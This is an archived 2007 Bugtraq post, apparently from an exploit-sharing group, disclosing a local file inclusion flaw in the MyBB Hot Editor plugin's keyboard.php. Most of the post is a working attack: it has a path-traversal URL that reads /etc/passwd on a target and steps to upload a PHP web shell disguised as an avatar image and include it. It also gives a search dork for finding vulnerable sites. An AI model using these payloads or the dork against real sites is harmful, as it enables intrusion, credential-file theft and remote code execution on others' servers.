lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070409134018.32702.qmail@securityfocus.com> Date: 9 Apr 2007 13:40:18 -0000 From: liz0@...w0rm.com To: bugtraq@...urityfocus.com Subject: Mybb Hot Editor Plugin Local File Inclusion <?php /* Vendor : Liz0ziM Web : www.expw0rm.com Mail : liz0@...w0rm.com --------------------------------------- Vul. Code : keyboard.php line 3 require_once "./vk_code/$first"; ---------------------------------------- */ http://victim.com/[path]/richedit/keyboard.php?first=../../../../../../../../../../../../../../../../../etc/passwd And upload php shell = > http://www.expw0rm.com/avatar_36.zip http://victim.com/[path]/richedit/keyboard.php?first=../../uploads/avatars/avatar_36.gif => target isn't show with ie.plese you use firefox Dork: "MTR Paket :" ?> // Exploit Worm www.expw0rm.com orginal: http://www.expw0rm.com/mybb-hot-editor-plugin-local-file-inclusion_no114.html